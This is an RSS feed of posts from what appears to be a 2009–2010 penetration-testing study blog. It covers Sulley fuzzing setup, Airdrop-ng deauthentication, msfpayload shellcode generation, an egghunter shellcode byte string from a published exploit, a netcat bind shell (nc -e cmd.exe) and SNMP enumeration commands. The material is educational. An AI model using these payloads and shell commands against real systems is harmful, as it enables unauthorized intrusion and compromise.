<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>News and updates</title><description>2010-03-23 13:04:09 - Yet Another Security Blog : Well, it's been in the making for a while. Due to certain events and health issues we've had trouble being consistent. Good for us, we've been able to work on our pet project: an all-French-language podcast. Loosely styled around PaulDotCom Security Weekly's format, we try to inform and give out bits of information to people. We also try to entertain, but remember we are not professionals at this. No spoon feeding: you won't learn to hack, penetrate or compromise systems, but you will learn basic information and where to start if you're interested. So far, we have 2 episodes available for download on iTunes, or as direct links from our site. Episode 1: we introduce ourselves and talk a bit about the Sulley Framework. Episode 2: a quick talk on Internet Explorer, Snort and Airdrop-ng. Here's the RSS feed if you wish. Keep in mind we're new at this, and will try to come out with new episodes once every 3 weeks to a month. Also, as a reminder, HackUS's CTF is very close, so check them out and get registered. Hackfest.ca 2010's call for papers is also open, so if you're interested or have something to say, drop them an email. Hope you enjoy the podcast. Have a good one.</description><link>http://www.secuobs.com/revue/news/204424.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/204424.shtml</guid></item>
<item><title>Airdrop-ng: what I've learned</title><description>Secuobs.com : 2010-03-10 04:47:39 - Yet Another Security Blog - It's been some time since I've posted something, and I apologize. Changed jobs, then the training and getting used to the new people and work environment (which is still ongoing) has prevented me from investing time into learning new security-related stuff. Well, today I took the time to try out airdrop-ng, the new de-authentication tool developed by TheX1le, if I'm not mistaken. The basic premise behind this Python application is pretty simple: prevent or allow client connections to wireless access points, either by the client's MAC address, vendor name etc., or by the access point's MAC, vendor etc. You can prevent 1 specific client from connecting to any access point in your area, or allow only that 1 client to connect. The possibilities are enormous. In a nutshell, you're deciding who can connect, and what they are connecting to. Here's the video presentation of airdrop-ng at ShmooCon 2010 (here). Installing airdrop-ng is quite simple (as usual I'm using BackTrack 4). I suggest reading the README file.

root@bt:~# apt-get install python-psyco
root@bt:~# cd /pentest/wireless/
root@bt:/pentest/wireless# svn co http://trac.aircrack-ng.org/svn/trunk/scripts/airdrop-ng
root@dorktest:/pentest/wireless/airdrop-ng# python install.py

There you have it, it's installed. Take the time to read the README file and the examples and explanations found in the docs folder. Using airdrop-ng is pretty easy (so far). For now I can only test it using 1 wireless card (the second is on the way). It works with the single card, but I can see why it would be better with 2. Using only 1 card, you kinda need to be specific in your rules file. For example, d/ANY|ANY won't work as well as d/ANY|Apple, since you need airodump-ng running the whole time airdrop-ng is: they seem to be battling each other for use of the card. Running d/ANY|ANY with one card will generate lots of errors. So d/AP MAC ADDY|ANY works also, but won't completely deny access to the access point. As far as my tests here go, my laptop would lose 50% of its pings. Although my laptop was still connected to the router, Internet access was pretty darn slow. Guess that's all for my findings on airdrop-ng so far. Once I get my second wireless adapter, I'll be in a better position to experiment and report on its usage. TheX1le's application is very nice, easy to use and understand. Besides a few typos in the documentation, it's an easy read and something I suggest you do. I'll try and whip up a video of it in action in the next few weeks. Thanks for reading, and remember to visit us at kioptrix.com.</description><link>http://www.secuobs.com/revue/news/200105.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/200105.shtml</guid></item>
<item><title>Sulley Framework Request Files</title><description>Secuobs.com : 2010-02-21 21:13:39 - Yet Another Security Blog - The Sulley Framework is a great fuzzing tool, one of the best out there in my opinion. Unfortunately, as far as I can tell anyway, development has stopped, meaning nothing new to the framework. For the last few months, I've been doing my best to learn this framework. Let me tell you, it hasn't always been easy. Not much information out there besides a few basic tutorials. Something else that is missing are request files. The request file is, in a sense, what makes fuzzing an application possible. There are a few files that come stock with Sulley, but not many. So I'm gonna try and remediate the situation by posting/sharing request files I've been able to find and/or create with the help of a few friends: Sulley Request Files, the Sulley Framework Request File Repository. My hope (in time) is to build a nice collection of files so people trying to learn and use Sulley can have a starting point. I also hope that veterans of the framework will be nice enough to contribute, point out mistakes and send in their own request files they've crafted over time. The site is pretty new, and I'm not a web designer. I'll do my best to update the file list when new ones are created, or sent in. So I call out to everyone that has experience with this framework to help out the new guys. Thank you, loneferret, www.kioptrix.com.</description><link>http://www.secuobs.com/revue/news/193960.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193960.shtml</guid></item>
<item><title>Automated tool dependency</title><description>Secuobs.com : 2010-02-14 17:34:32 - Yet Another Security Blog - A while ago, when I was doing the OSCP course, I learned about shellcodes and exploits. During this time, usage of Metasploit's online shellcode generator was really useful. When it came down to exam time, well, the site was down. No more automated tool, and this during my 24 hour exam. What did I do? A little Google search and presto, found how to correctly use msfpayload / msfencode. All was well. Since then, I've gone back to using the online tool. Bad idea. I say this because recently, I've had to generate some shellcode for an exploit. Of course the automated online tool was down. This forced me once again to re-learn the command line tool. This made me realize two things: 1) we rely way too much on automated tools; 2) laziness kicks in so very fast. I mean, it isn't that hard to use and remember. Just need to type it a few times to get the syntax burned into that gray matter of ours.

msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x2f\x5c' -e x86/shikata_ga_nai -t c

Here's an example of using both msfpayload and msfencode. The payload is windows/exec, the CMD is calc.exe and we output the raw code (R). We pipe that into msfencode. The -b is the list of bad characters, the -e is the encoder (in this case shikata_ga_nai) and we output to C format using the -t switch. There are plenty of online resources that can show you how to use it. This is true for every automated tool we are used to using. Bottom line: if it's command line and there's an automated tool, learn the command line first. You never know when that automated one will be pulled off the air.</description><link>http://www.secuobs.com/revue/news/191794.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/191794.shtml</guid></item>
<item><title>The Sulley Framework -Basic part 2-</title><description>Secuobs.com : 2010-02-06 05:43:13 - Yet Another Security Blog - In my previous entry on the Sulley Framework, we took a look at a simple request and session file to fuzz an FTP server. This time we'll look at what we need to have and do to fuzz a TFTP server. The big difference is one uses the TCP protocol and the other UDP. By default Sulley will connect to TCP ports. We need to specify that we are trying to fuzz UDP. This is specified in our session file:

from sulley import *        # import everything from Sulley
from requests import tftp

sess = sessions.session(session_filename="audits/tftpserver.session", proto="udp")
# Target IP xxx.xxx.xxx.xxx
target = sessions.target("xxx.xxx.xxx.xxx", 69)   # 69 is the standard TFTP port
target.netmon  = pedrpc.client("xxx.xxx.xxx.xxx", 26001)
target.procmon = pedrpc.client("xxx.xxx.xxx.xxx", 26002)
target.procmon_options = {"proc_name" : "tftpserver.exe"}   # placeholder: the TFTP server's process name
sess.add_target(target)
sess.connect(s_get("tftp"))
sess.fuzz()

Once you've specified the proto parameter, the rest of the session file is pretty much the same as fuzzing any other protocol. Now that you have your session file configured for UDP connections, you'll need a request file. I found this basic TFTP request file on the Internet (here). Now that we have our session and request file, there's one more change that needs to be done before we can appreciate all of this. When fuzzing a TCP protocol, you would run the network_monitor script like so:

C:\sulley&gt;python network_monitor.py -d X -f "src or dst port XX" -P path

Well, since this is UDP and the traffic is only one way, that pcap filter string won't capture anything. So you'll need to enter it this way:

C:\sulley&gt;python network_monitor.py -d X -f "udp dst port XX" -P path

As with anything script related, this can be improved. So now you can pretty much follow my previous blog post on Sulley, or view the video on kioptrix.com, and start fuzzing UDP. Try downloading a known vulnerable TFTP server and watch it fuzz. Here's a nice little list from exploit-db that you can have fun with. As always, I'll try and get a video up demonstrating this. Always fun to make those, and perhaps I'll actually put the Benny Hill theme song on, or just sound. One day perhaps. Thanks again, hope you enjoyed this little read and remember to visit us at www.kioptrix.com.</description><link>http://www.secuobs.com/revue/news/189224.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/189224.shtml</guid></item>
<item><title>Java Signed Applets</title><description>Secuobs.com : 2010-01-30 22:56:03 - Yet Another Security Blog - Been pretty busy these past few weeks, and finding the time to post stuff up is getting difficult. But I do bring something fun to watch. If you administer users, you should have a look at this video: Java Signed Applet. If you want a little more information on how to test this exploit in a controlled environment, head over to PaulDotCom. Their screencast is a little more complete than mine; I just wanted to prove a point. Hope you enjoy it.</description><link>http://www.secuobs.com/revue/news/187000.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/187000.shtml</guid></item>
<item><title>Windows wide open?</title><description>Secuobs.com : 2010-01-20 03:15:59 - Yet Another Security Blog - With the recent attacks on Google, Adobe and Yahoo (just to name a few) thanks to the Aurora exploit, Internet Explorer is something to be avoided at the moment. Unless you're running version 5.01, I would suggest switching to Firefox for the time being. As far as I know, Microsoft has not released a patch for this one. Let's hope they do. As far as I can tell, and with a little info from exploit-db, remote code execution is only functional under Windows XP running Internet Explorer 6. That doesn't mean newer versions of Internet Explorer are not affected; we just don't know about it yet. IE 7/8 will crash under Windows XP, and DEP under Vista/7 should stop the crash in time. So it's a good idea to listen to Microsoft and enable DEP and everything else under the sun to protect your system(s). Especially now that there's another exploit that basically guarantees privilege escalation: the Ring-0 exploit is the latest one, and let me tell you, I've tested this privilege escalation exploit on Windows XP SP2/SP3, Windows Server 2008 Enterprise and Windows 7. Dookie from exploit-db tested it on Windows Server 2003. We all got a SYSTEM shell. Not scared yet? You should be. You can read more about it in the link I provided just above. Does this mean Windows is wide open at the moment? Should we close down the Internet and our corporate networks? Well, even if that would be a great solution, it's impossible. There is one way to protect one's self (or help reduce the risk/damage): DON'T RELY ON JUST A FIREWALL. Let your network administrators install Snort. Let them monitor inbound as well as outbound traffic. Don't close your eyes and say "there's no reason to get hacked, we're a small company" (of course this is more for any managers reading this). I'd like to meet the guy that said Linux is less secure now. So good luck this week, and let's hope Microsoft comes up with something soon. I need to scare the pants off my boss tomorrow; need to work on a nice scenario to really convince him. Again, good luck, all of you.</description><link>http://www.secuobs.com/revue/news/183359.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/183359.shtml</guid></item>
<item><title>The Sulley Framework -Basic-</title><description>Secuobs.com : 2009-12-28 00:05:26 - Yet Another Security Blog - Ref: Gray Hat Python. The framework is coded entirely in Python and is open source. Developed by Pedram Amini and Aaron Portnoy from TippingPoint, Sulley is a fuzzer packed with interesting capabilities, such as packet capturing, crash reporting and VMware automation. It also has the capability to restart the target application in the event of a crash, then continue on with the fuzzing process. For data generation, Sulley uses block-based fuzzing, the same method used by Dave Aitel's SPIKE. So if you're familiar with SPIKE, you shouldn't have much trouble with this fuzzer. In block-based fuzzing, you build up a general skeleton for the protocol or file you are fuzzing. There's going to be an example later in this post. One great feature this fuzzer has over others is the ability to show the CPU's registers at the moment of the crash. Sulley comes with PyDBG, and once the framework is installed it uses this to monitor the process you are fuzzing. Another one is Sulley's ability to monitor the network (using pcapy), capturing every fuzz sent to the target, creating one pcap file for each attempt. This way you can follow your progress, or review your fuzzing session. Lastly, you can even see the fuzzing progress via an HTML page. The page shows you which variable it's currently fuzzing and its progress.

Sulley Primitives

Strings: Sulley uses the s_string() directive to denote that the data contained is a fuzzable string. So if we wanted to fuzz an email address, we'd declare it like this in our skeleton:

s_string("fuzzing@sulley.com")

This tells Sulley it's a valid value, so it will fuzz that string and exhaust all reasonable possibilities. Once it's finished, it will revert to its original value and continue fuzzing the rest of the declared values down the file.

Delimiters: this is just a small string that helps break up larger ones. If we take our email example from above, the delimiter would be the @ sign. This is how we'd pass this primitive on to Sulley:

s_string("fuzzing")
s_delim("@")
s_string("sulley")
s_delim(".")
s_string("com")

Like the s_string() primitive, the delimiter is also fuzzed. In this example, odds are the @ is a value we really don't need to fuzz, so we can tell Sulley not to fuzz it like so:

s_delim("@", fuzzable=False)

Static: the values passed to a static string remain unchanged (or un-fuzzed, I suppose):

s_static("\r\n")

So let's take a look at a complete, yet small and simple, skeleton file. In this example, we'll look at the FTP protocol.

# import all of Sulley's functionality
# We'll call this file ftp_ability.py
from sulley import *

s_initialize("user")
s_static("USER")
s_delim(" ", fuzzable=False)
s_static("ftp")
s_static("\r\n")

s_initialize("pass")
s_static("PASS")
s_delim(" ", fuzzable=False)
s_static("ftp")
s_static("\r\n")

s_initialize("stor")
s_static("STOR")
s_delim(" ", fuzzable=False)
s_string("AAAA")
s_static("\r\n")

You can see, it's pretty simple. This file basically feeds Sulley with starting values and it takes it from there, fuzzing the fields you denoted as fuzzable: in this case the username, password and the STOR command. Depending on the target FTP server, you'll add and/or remove commands. Not every FTP server will have STOR, and not all of them have LIST. So this is where you'd supply a valid list of commands. Now that we've seen our blocks, let's take a look at the session file, the file that starts the whole fuzzable process:

from sulley import *              # import everything from Sulley
from requests import ftp_ability  # this is our ftp_ability.py file from the requests folder

def receive_ftp_banner(sock):
    sock.recv(1024)

sess = sessions.session(session_filename="audits/ability.session")
target = sessions.target("xxx.xxx.xxx.xxx", 21)           # Target IP xxx.xxx.xxx.xxx
target.netmon  = pedrpc.client("xxx.xxx.xxx.xxx", 26001)  # Target IP xxx.xxx.xxx.xxx
target.procmon = pedrpc.client("xxx.xxx.xxx.xxx", 26002)  # Target IP xxx.xxx.xxx.xxx
target.procmon_options = {"proc_name" : "Ability Server.exe"}
sess.pre_send = receive_ftp_banner   # grab the banner
sess.add_target(target)
sess.connect(s_get("user"))                  # Notice our commands from the previous file
sess.connect(s_get("user"), s_get("pass"))   # This tells Sulley user must be authenticated to use this command
sess.connect(s_get("pass"), s_get("stor"))
sess.fuzz()

Because most FTP servers send a banner, we tell Sulley to wait for it before fuzzing any data. The next thing is the session file, which keeps track of our overall session. This allows us to stop and restart our fuzzing where we had previously left off. After that we define our target with the appropriate IP and port number, in this case an FTP server. After defining the target, we tell our network sniffer to set itself up on the same host, listening on 26001. Last, we tell our debugger that it is listening on the same host and on 26002. We chain in the authentication commands and tell Sulley to start fuzzing. To start the fuzzing process, we need to have Sulley installed on 2 machines (I find it less confusing this way): the attacking and victim machines.

From the target machine:
1) start the process we want to fuzz (in this case Ability Server);
2) attach the process monitor to our server:

C:\sulley&gt;python process_monitor.py -c c:\ability.crash -p "Ability Server.exe"

3) attach the network monitor to our network card and have it sniff for specific traffic. The -P parameter is where to store your pcap files; you must create this folder first. You can use a mapped drive too:

C:\sulley&gt;python network_monitor.py -d 1 -f "src or dst port 21" -P z:\

From our attacking machine:
1) execute the session file from Sulley's root directory:

C:\sulley&gt;python ftp_session_ability.py

Once the process has started, you can point your browser to the attacking machine's IP on port 26000 to get a progress report. You need to manually refresh the page. Once the application crashes, you'll be able to see the crash report on the page, enabling you to see what was overwritten in the CPU's registers. You can get the install executable here, and the PDF here. I'll be posting a video on kioptrix.com to demonstrate all of this, using the same files and vulnerable application mentioned above. Thanks to dookie for pointing out a few mistakes of mine while I was setting up Sulley for the first time, and also to the Gray Hat Python book that gave me a good push with this. Next week, fuzzing the wife to get... wait, wrong blog.</description><link>http://www.secuobs.com/revue/news/176038.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/176038.shtml</guid></item>
<item><title>General purpose CPU registers</title><description>Secuobs.com : 2009-12-20 04:09:59 - Yet Another Security Blog - I just needed to type this somewhere so I don't forget. Maybe by putting it here, it will be of some use to others. A CPU uses 8 general purpose registers: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX. Each register is designed for a particular purpose, and each performs a function that enables the CPU to efficiently process information. The EAX register is used to perform calculations as well as storing return values from function calls. Basic operations like add, subtract, and compare are optimized to use the EAX register. More specialized operations like multiplication and division can occur only within the EAX register. EDX is the data register. It's basically an extension of EAX to assist it in storing extra data for complex operations. It can also be used for general purpose data storage. ECX, also called the count register, is used for looping operations. The repeated operations could be storing a string or counting numbers. ESI and EDI are relied upon by loops that process data. The ESI register is the source index for data operations and holds the location of the input data stream. EDI points to the location where the result of the data operation is stored, the destination index. ESP is the stack pointer, and EBP is the base pointer. These registers are used for managing function calls and stack operations. When a function is called, the function's arguments are pushed on the stack and are followed by a return address. The ESP register points to the very top of the stack, so it will point to the return address. EBP is used to point to the bottom of the call stack. EBX is the only register that was not designed for anything specific. It can be used for extra storage. EIP is the register that points to the current instruction being executed. As the CPU moves through the binary executing code, EIP is updated to reflect the location where the execution is occurring.</description><link>http://www.secuobs.com/revue/news/174341.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/174341.shtml</guid></item>
<item><title>Looking at EggHunters</title><description>Secuobs.com : 2009-12-11 23:03:43 - Yet Another Security Blog - Buffer overflows can be a daunting part of exploitation, almost esoteric in nature if you don't have an idea of what's going on in the background. A little while ago I posted an exercise for Easy Chat Server with a proof of concept. If you successfully accomplished the task, you may like this little entry: egghunters. An egghunter is a bit of code that, once executed, will search the memory for a specific string called the egg. Once it's found the egg, your shellcode is then executed. Well, so far it doesn't seem too complicated, does it? So why would you want this solution to exploit a buffer overflow vulnerability? Well, once you've overwritten EIP and jump to your buffer where the shellcode would go, what would happen if you only had about 50 bytes of usable space? This would be a nice example of when an egghunter would be used. The egghunter itself is about 32 bytes, the egg is 4 bytes (times 2) and then you have your shellcode. When you send your evil buffer, the egghunter is placed in the part of memory you overwrite. The shellcode is stuffed somewhere else, its location unknown to us. Once EIP is pointed to your buffer space, the hunter is executed and then searches the memory for your shellcode. To put it roughly, it would look like this: offset + egghunter + egg + shellcode. As long as the egghunter fits the buffer space EIP is sending you to, you're in business. Here's a nice example of code using the egghunter method. It was coded by Dr_IDE (an OSCP graduate) and dookie2000ca (star quarterback for the Edmonton Roughriders back in '86). It's well coded and very easy to read: Eureka Mail BoF SEH. So let's try and break down the above exploit, shall we? First we have the egghunter. Notice the commented part: this is the egg, w00t.

egghunter = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74"   # this is the egg (w00t)
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)

The hunter is set up to look for the string w00t in memory. It loops through and compares the value to \x77\x30\x30\x74. It will loop until it finds the egg, break out of the loop and execute the shellcode found directly after it. The next few parts of the file are pretty standard stuff: return address, short jumps and nop slide. Won't go into that, but let me direct your attention to the last part, where the buffer is built:

sploit = "-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell

As you can see, we have our egg there. The hunter will look for 2 instances of the string w00t in a row, and execute the code following it. There is one downside to using the egghunter method: it's CPU intensive. Once the egghunter is executed, CPU usage will go through the roof and reach 100%. On the other hand, you'll be able to send almost any sized payload. Here's a very interesting video showing an egghunter. It's from Offensive-Security's video vault: HP NNM from Bug to 0day. I'll try and post a video on kioptrix.com showing the egghunter in action. The above video is very clear in explaining, but the video quality can be lacking at times (but not very).</description><link>http://www.secuobs.com/revue/news/171186.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/171186.shtml</guid></item>
<item><title>HackUS 2010 CTF Event</title><description>Secuobs.com : 2009-12-08 15:18:24 - Yet Another Security Blog - HackUS First Edition is a capture the flag event being held in Sherbrooke, Quebec in April of 2010. The event will last a full 48 hours, which is guaranteed to keep you from actually getting any sleep. More details can be found on their website: HackUS. Also, here are a few of the prizes made available thanks to Offensive-Security's generosity: PWB w/ 60 day lab access, CTP w/ 60 day lab access. Now that's what I call an incentive to participate. Registration is only 110 CAD and includes meals and accommodations, with transportation from the hotel to the event site. It's 50 CAD if you don't want a hotel room (or plan on not sleeping). I had the pleasure of e-mailing one of the organizers. Must say, very nice, and he's obviously into information security. The Sherbrooke team came in second place at the Hackfest.ca CTF event this past November, just one point shy of the UQAM team. I'm sure you guys will get your revenge in April. So if any of you are near the Quebec border, I highly recommend this. Check out their site, and hope to see you there. I'll be participating, but will only send in my registration fees after Christmas. Bills, bills, bills.</description><link>http://www.secuobs.com/revue/news/169706.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/169706.shtml</guid></item>
<item><title>OSCP vs PTF</title><description>Secuobs.com : 2009-12-05 18:21:45 - Yet Another Security Blog - I recently completed 2 security-related certifications. The first is Offensive-Security's OSCP (Pentesting With BackTrack) and the other is Heorot's PTF (Pentesting Fundamentals). Here is where you can find more information on both certifications: Pentesting Fundamentals (Heorot), OSCP (Offsec). The point of this blog is not to bash or flame one certification. Both are challenging and interesting in their own way. It's just that, depending on how you look at it, one is more advanced than the other. Seeing that difficulty is very relative to each individual person, if I refer to one as being more difficult, keep in mind it's my opinion. Let's start off by describing each training course; let's talk about Heorot's PTF. Once a student starts the course, he receives an e-mail with links and access codes to the online training material. This is comprised of videos, slides and documents. Also, 2 live CD images are needed for the course. The first CD is the first De-ICE live CD, used during the course itself. The second is the vulnerable system which is your target to complete the course. You get to run a mock pentest on this system following the methodology (based on the ISSAF) learned in the course. Once you've finished, you write up your report as explained in the ISSAF and send it on its way for review/grading. Offensive-Security's PWB takes a different approach. Once the course starts (classes start on a Saturday), the student gets an e-mail with access to the course material (video and PDF) and access to an online lab. Throughout the course, the student gets to follow the teacher and practice on live hosts (in a secure and legal environment). Students get the chance to run scans, exploits and other techniques on various operating systems. Once all the exercises are completed, an exam is scheduled. Upon completion of the exam, the fail or pass e-mail is sent within 72 hours. So in a nutshell, they are both courses that teach you about penetration testing. One is more documentation/methodology driven, and the other has a more hands-on approach. So which is better? Which one should you take? Which one should you take first? Which one is harder/easier? Which one is worth it? Well, the answer to all those questions really depends on one's personal skill level and experience. When I started OSCP, I had no prior experience with exploits, Metasploit and other info-sec related activities. I did however have a pretty good knowledge of the Linux operating system, networking and programming. Even with all that, I found the course extremely challenging, if not out of my league at times. Still, with some effort and research, I managed to pass the 24 hour exam and receive my certification. After doing all that, I waited a few months and tried my hand at Heorot's fundamentals course. Being a fundamentals course, and documentation/methodology driven, the penetration and exploitation of the target system was easy in comparison to OSCP. The goal in PTF is not to see if you can pop a box, but to properly produce a penetration report following certain guidelines. As you can see, depending on what you already know (or don't know), both certifications can have a strong learning curve. For me, well, PTF was a bit of a disappointment seeing the cost and the time it's taking to grade my report (as of today it's been over a week and still no news). So for the cost, in my opinion, if you already have experience with vulnerability scanners and frameworks such as Metasploit / w3af etc., go for OSCP. Once you've done that, nothing stops you from downloading the ISSAF methodology documentation free from their website. If you don't have any prior experience, then PTF would be a good place to start. You get to learn the basic tools, such as nmap / hydra, and properly conduct a pentest from A to Z. The answers to all my previous questions above all come down to this: it depends on you. Thanks for reading.</description><link>http://www.secuobs.com/revue/news/169020.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/169020.shtml</guid></item>
<item><title>A bit of information</title><description>Secuobs.com : 2009-12-02 14:48:53 - Yet Another Security Blog - An interesting article on VPN attacks that bypass browser security. My colleague sent this link, pretty good read: US-CERT Warns Of VPN Attack. Interesting site that lets you search specific countries and open ports. Try it out for yourself, it's not perfect but pretty cool (i.e. port:22 country:CA): SHODAN. ------ A SANS article: "Microsoft Looking Into Black Screen Problem" (November 30, 2009). Microsoft is investigating reports that security updates it released in November are causing black screens on some users' computers. The updates allegedly change Access Control List (ACL) entries in the registry. The problem appears to affect computers running Windows 7, Vista and XP. Related articles: TechWorld, CNet. ------ BackTrack 4 is up to kernel 2.6.30.7. If you have a problem with PostgreSQL 8.3 on boot up after a dist-upgrade, here's a fix that worked for me: just edit the postgresql.conf file found in /etc/postgresql/8.3/main and set ssl to false. If you do need SSL, here's a link to fix that as well (link). Also, if you update/upgrade everything, you may end up with one package that won't upgrade for some reason. This has been mentioned in the Remote-Exploit forum, but has yet to be addressed as far as I can tell. Package: backtrack-sniffers.

# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  backtrack-sniffers
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.

------ I guess by now everyone knows that Metasploit now has colour. Have to admit, it does look good. Also, the colour seems to help me out. There's also an interesting article recently written about Rapid7's NeXpose Community Edition, a free version of their commercial software with Metasploit integrated into it: Penetration Testing in the Marketplace 2010, and Rapid7 Releases Free Version of NeXpose. ------ Well, I don't have much time to try out anything really security related these days. So I'll try and pass on information I fall on for the next few weeks. Remember to visit us on our website, Kioptrix.com. The site ain't finished but should be up and running by the end of December. So in the meantime, download the VMs and tell us what you think. If you have built a few vulnerable VM images yourself, place a comment here and we'll do our best to host them. Have a good one.</description><link>http://www.secuobs.com/revue/news/167813.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/167813.shtml</guid></item>
<item><title>New home soon</title><description>Secuobs.com : 2009-11-30 14:01:46 - Yet Another Security Blog - My blog will have a new permanent home soon. A friend and I have set up a small website, and I'll be moving this blog there. Going to be fun, I'll be able to post screen-shots and better serve the public with my small IT tutorials and everyday sysadmin rants. At the moment the site is not 100% complete. It does have many links to tools, videos, articles and RSS feeds we find interesting. We also have 2 vulnerable VM images on which one can practice scans and penetration methods. We hope people will enjoy it. The site's purpose is to gather as much information relating to IT security and place it in one neat little package. We are fully aware of the fact that many sites like this exist, but one more won't hurt. If it can help one or two people find an interesting fact on security, I'll be happy. The website will be re-written in French so as to better serve the people in my region, and perhaps even a pod-cast (French). We don't pretend to be the best in this field, but we are 2 guys willing to learn and share. So to everyone who actually reads my blog (yes, all 2 of you), thanks, hope you visit the site: Kioptrix </description><link>http://www.secuobs.com/revue/news/166742.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166742.shtml</guid></item>
<item><title>Obligatory first post</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Well, after years of reading other people's blogs, after weeks of debating if I should start one of my own, and wondering what I would write about, I finally figured out a subject: computers, network security and other related subjects. Now, I'm no expert. Not a professional security consultant, nor am I a security analyst. I'm a system administrator, presently learning the ins and outs of security. Figured I'd use a blog as a reference. I'll post links to articles related to computer networking and network security, and maybe type up some of my own learning experience during my journey into this strange, difficult and mythical subject known as "Penetration Testing". A little about myself I suppose. Been in IT for a few years now, and like many I've had a computer since I was a kid (back in the 8086 days). Got a few certifications such as MCDST, CompTIA Linux+, Network+, i-Net+ and for some reason I have a CIW certification... don't ask. Presently working on Offensive Security 101 (now known as Pentesting with Backtrack), so I'm looking forward to eventually getting the Offensive Security Certified Professional, or OSCP. So odds are, I'll mostly be posting my experiences along the course, without going against the course's copyright. Let me tell you, this one is hard. </description><link>http://www.secuobs.com/revue/news/166610.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166610.shtml</guid></item>
<item><title>Simple Netcat usage</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - Netcat is a powerful tool that everyone should learn to use. I've only been aware of this tool for about a month now, and already I'm finding ways to use it (or situations where it could be useful) at work. Netcat is able to connect, read and write to any port using TCP or UDP protocols. One can send and receive files, scan ports and you can even redirect standard input/output/errors with netcat. It's also possible to use netcat for port redirection. Here are a few interesting articles about Netcat: GIAC, Wikipedia
---------------------------------------------------------------------
Here are a few simple examples of the netcat syntax. Let's look at transferring a text file from a Windows machine to a Linux machine. Of course, we'll assume the Windows system has a copy of netcat. First, the Linux machine, receiving the file, needs to set up a listener:
linux# nc -lvp 4444 &gt; output.txt
Any traffic directed to port 4444 will be directed into the output.txt file. Second, the Windows system will open a connection and send the text file:
C:\&gt; nc -nv -Linux IP here- 4444 &lt; test.txt
The contents of test.txt will be piped into port 4444, and sent to our listening Linux machine. Now netcat doesn't have any "progress bar" to show when the transfer is completed, so you need to guess and kill the connection manually using the CTRL-C key combination.
---------------------------------------------------------------------
Banner grabbing with netcat is pretty simple. All one needs to do is connect to the specified IP address and port. Once connected, depending on the port one used, commands can be issued to gather more information. Of course, all services will give out banners, and systems administrators can always remove the banner. Let's look at how one can retrieve an SMTP banner:
linux# nc -nv -IP address- 25
Sometimes, but not always, the SMTP server will give out information such as "Sendmail 8.13.1/8.13.1". One can also type in commands once connected to verify the existence of users.
---------------------------------------------------------------------
Another fun thing one can do with netcat is command redirection. Using the "-e" switch, you can redirect standard input, output and error to a specific port. So we can essentially send a command shell via netcat, so let's do this. Imagine 2 users on the same network, John and Cindy. John needs Cindy's assistance on his computer and wishes to send her a command shell over the network to her computer. So let's start by starting netcat on a particular port, and bind/redirect our command shell to it. From John's computer:
C:\&gt; nc -lvn 4444 -e cmd.exe
This will basically redirect all input/output/errors from cmd.exe to port 4444. From Cindy's computer: Now that John's netcat is waiting for a connection, all that Cindy needs to do is connect to John's computer on port 4444 and she should receive the command prompt:
linux# nc -nv -John's ip here- 4444
This is called a bind shell. Try it and see. </description><link>http://www.secuobs.com/revue/news/166609.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/166609.shtml</guid></item>
<item><title>SNMP Protocol - snmpwalk</title><description>Secuobs.com : 2009-11-30 04:57:11 - Yet Another Security Blog - SNMP is a management protocol often used to monitor and remotely configure servers and other network devices such as switches, routers, etc. This protocol has a weak authentication system (public and private community strings). Public community string: can read information from an SNMP enabled device. Private community string: can often reconfigure a device. Wikipedia has a nice article about this, and also the MIB tree, which you can find here.
---------------------------------------------------------------------
Scanning machines with SNMP enabled can give interesting results if improperly configured. Many tools exist, but the one I was exposed to during my Offensive Security course was snmpwalk. Scanning a Windows system running SNMP: from our Linux machine's shell, we would type the following command to scan a single machine:
linux# snmpwalk -c public -v1 -target IP-
This can return information such as running services and/or installed applications. Also somewhere in the output, we could find the operating system's version. It can be a very long output, so using grep is a good idea:
linux# snmpwalk -c public -v1 -target IP- | grep sysDescr.0
One can also enumerate users with snmpwalk:
linux# snmpwalk -c public -v1 -target IP- 1 | grep 77.1.2.25 | cut -d " " -f4
Enumerating services with snmpwalk:
linux# snmpwalk -c public -v1 -target IP- 1 | grep hrSWRunName | cut -d " " -f4
Enumerating TCP ports:
linux# snmpwalk -c public -v1 -target IP- 1 | grep tcpConnState | cut -d " " -f4
And enumerating installed applications:
linux# snmpwalk -c public -v1 -target IP- 1 | grep hrSWInstalledName | cut -d " " -f4
